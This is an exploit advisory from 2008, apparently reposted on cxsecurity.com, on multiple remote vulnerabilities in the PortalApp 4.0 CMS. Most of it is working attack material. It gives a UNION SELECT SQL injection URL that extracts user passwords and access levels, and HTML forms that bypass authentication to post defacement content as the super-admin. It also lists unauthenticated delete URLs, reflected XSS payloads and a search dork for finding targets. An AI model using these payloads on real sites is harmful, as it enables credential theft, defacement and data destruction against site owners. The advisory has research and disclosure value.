PortalApp 4.0 (SQL/XSS/Auth Bypasses) Multiple Remote Vulnerabilities

2008-10-20 / 2008-10-21
Credit: r3dm0v3
Risk: High
Local: No
Remote: Yes

############################################################################## #Title: PortalApp 4.0 Multiple vulnerabilities # # # #Discovered By: r3dm0v3 # # http://r3dm0v3.persianblog.ir # # r3dm0v3( 4t }yahoo[dot}com # # Tehran - Iran # # # #Vendor: http://www.portalapp.com # #Vulnerable Version: 4.0, prior versions maybe vulnerable # #Remote Exploit: Yes # #Dork: "Copyright @2007 Iatek LLC" # #Fix: Not Available # ############################################################################## ############################################################################## # SQL Injection (CRITICAL) # ############################################################################## #Description: PortalApp is a Content Management System (CMS) for websites. Bug: The user input 'sortby' is directly used in query statement! #Exploit: http://site.com/forums.asp?keywords=r3dm0v3&do_search=1&sortby=users.user_name+UNION+SELECT+1,2,3,4,5,password,user_name,8,9,10,user_id,accesslevel,13,14,15+FROM+Users author will be usernames topic will be passwords replies will be username IDs views will be access levels (5 is super admin) ############################################################################## # Following actions in 'forum.asp' can take done without any authentication. # ############################################################################## create a forum: <html> <form action=http://site.com/forums.asp?action=insert_level1_edit_disc_forums method=post> userid:<input type=text name=user_id value=255>by default 255 is sa<br> ForumName:<input type=text name=ForumName value="H4c|<3d bY r3dm0v3"><br> Description:<input type=text name=Description value="r3dm0v3 was here. <a href=http://r3dm0v3.persianblog.ir>http://r3dm0v3.persianblog.ir</a>"><br> ForumSection:<input type=text name=ForumSection value="Hacked"><br> DisplayOrder:<input type=text name=DisplayOrder value=1><br> <input type=submit> </form> </html> create a topic: <html> <form action=http://site.com/forums.asp?action=insert_level2_edit_disc_topics method=post> userid:<input type=text name=user_id value=255>by default 255 is sa<br> ForumID:<input type=text name=ForumId value=><br> Subject:<input type=text name=Subject value="r3dm0v3."><br> Message:<br><textarea rows=3 cols=50 name=Message>r3dm0v3 was here.</textarea><br> Icon:<input type=text name=Icon value=14><br> Show Signature:<input type=text name=Showsignature value=0><br> Notify:<input type=text name=Notify ><br> Locked:<input type=text name=Locked value=1><br> Sticky:<input type=text name=Sticky ><br> Date:<input type=text name=DateAdded value="6/1/2008"><br> DateLast:<input type=text name=DateLast value="6/1/2008"><br> <input type=submit> </form> </html> delete a forum: http://site.com/forums.asp?action=delete_level1_edit_disc_forums&ForumId=[ForumID] delete a topic: http://site.com/forums.asp?action=delete_level2_edit_disc_topics&TopicId=[TopicID] delete a reply: http://site.com/forums.asp?action=delete_level3_edit_disc_replies&ReplyId=[ReplyID] delete a topic reply: http://site.com/forums.asp?action=delete_level2_disc_replies&TopicId=[TopicID]&ReplyId=[ReplyID] #There some other actions: insert_level3_edit_disc_replies insert_detail_disc_topics update_level1_edit_disc_forums update_level2_edit_disc_topics update_level3_edit_disc_replies update_detail_disc_topics update_level2_disc_replies ############################################################################## #Following actions in 'Content.asp' can take done without any authentication.# ############################################################################## Add content: <html> <form action=http://site.com/content.asp?action=insert_detail_default method=post> userid:<input type=text name=user_id value=255>by default 255 is sa<br> ContentTypeID:<input type=text name=ContentTypeID value=2>1:general(company) 2:article 3:lin 4:news 5:announcement 6:download 7:gallery 8:faq ...<br> catID:<input type=text name=CatID value=198><br> Date:<input type=text name=DateAdded value="6/1/2008"><br> Author:<input type=text name=Author value=r3dm0v3><br> title:<input type=text name=Title value="h4ck3d bY r3dm0v3"><br> ShortDesc:<br><textarea rows=3 cols=50 name=ShortDesc>r3dm0v3 was here.</textarea><br> LongDesc:<br><textarea rows=4 cols=50 name=LongDesc>r3dm0v3 was here. http://r3dm0v3.persianblog.ir</textarea><br> relatedULR<input type=text name=RelatedURL value="http://r3dm0v3.persianblog.ir"><br> DownloadURL:<input type=text name=DownloadURL><br> Filename:<input type=text name=Filename><br> Thumbnail:<input type=text name=Thumbnail><br> Image1:<input type=text name=Image1><br> PrevContentID:<input type=text name=PrevContentId><br> NextContentID:<input type=text name=NextContentId><br> views:<input type=text name=Impressions value=10000><br> AVGRating:<input type=text name=AvgRating value=10000><br> <input type=submit> </form> </html> 'insert_detail_content' is also vulnerable. Use above html code for exploit ############################################################################## # XSS # ############################################################################## http://site.com/forums.asp?keywords=%27%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&do_search=1 http://site.com/content.asp?ContentType=General&keywords=%27%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&do_search=1

References:

http://www.aspapp.com/content.asp?CatId=197&amp;ContentType=Downloads
http://xforce.iss.net/xforce/xfdb/39455
http://www.securityfocus.com/bid/27170
http://secunia.com/advisories/28337


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top